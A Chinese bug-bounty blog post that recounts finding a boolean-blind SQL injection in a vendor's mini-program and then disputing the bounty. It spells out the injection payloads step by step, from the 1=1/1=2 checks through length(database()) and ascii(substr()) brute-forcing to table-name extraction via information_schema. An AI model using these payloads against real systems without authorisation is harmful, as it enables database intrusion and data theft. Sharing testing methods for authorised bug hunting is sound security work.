前言
身为一个菜狗,当然想去src厂商哪里挖掘漏洞,获取赏金得到激励。于是乎,我去补天哪里随便找到一个厂商就开始了我的漏洞挖掘。(注:以下漏洞厂商已修复)
一、信息收集
通过爱企查,查找对方公司的域名,小程序,APP之类的,然后使用360quake,OneForAll,鹰图进行子域名查询等等,
时间太久了,很多图没有截上去,希望大佬勿喷
二、开始漏洞挖掘
在所有web网站进行挑选挖掘后,感觉实在挖不倒(太菜了,没有挖到),于是眼光开始转向新的方向,小程序渗透。至于如何抓包,这里不多讲,网上文章很多。
找找找中,看见一个很新鲜的小程序,于是打开进去,通过burp,看见post请求里面有id,于是测一波看有没有SQL注入
先进行注入判断, 'and 1=1#
回显正常
'and 1=2#
报错了,SQL注入来了啊
可以看出布尔盲注,于是接着构造攻击语句
判断数据库的长度
'and length(database())=8#
报错,在
'and length(database())=9#
正常回显,说明数据库名为9位数
获取数据库名,这里我们采用burp爆破模式
Payload:’and ascii(substr(database(),1,1))=§1§#
通过累加1获得数据库的ascii码值,在进行解码,获得数据库名
db_around
接着获取表名
'and ascii(substr((select table_name from information_schema.tables where
table_schema=database() limit 0,1),1,1))=§9§#
依次通过累加limit 的1获取到第一个表名
adb_task
后面就不跑了,交洞交洞,拿赏金去
三、挫折出现
漏洞提交后,静等审核
结果,居然打偏了,泪奔,太想哭了,亏自己兴奋一晚上,后面洞就放哪里不管了
然后转折出现,厂商发布收录域名,最后我一看,漏洞的域名属于收录范围啊,兴致冲冲在跑去交洞
又是兴奋的一晚上,结果
哭死,加气死,什么魔鬼啊,拒绝,难受死,理由却是
顶不住,就因为挖到洞,就连夜下资产吗,痛哭
最后转折,偷偷私聊审核,让审核帮我,最终在审核的帮助下,我拿到了赏金
虽然只有一百块,总比没有强,哭死。这个厂商记小本本,以后少碰
结语:这篇文章呢,想告诉大家我的漏洞挖掘思路,其次呢,就是一些厂商如果赏金不肯给的话,一定要想想办法,看能不能解决,不能就当吃哑巴亏吧,记在自己的小本本上,以后注意一点,最后,希望各位大佬天天爆大洞。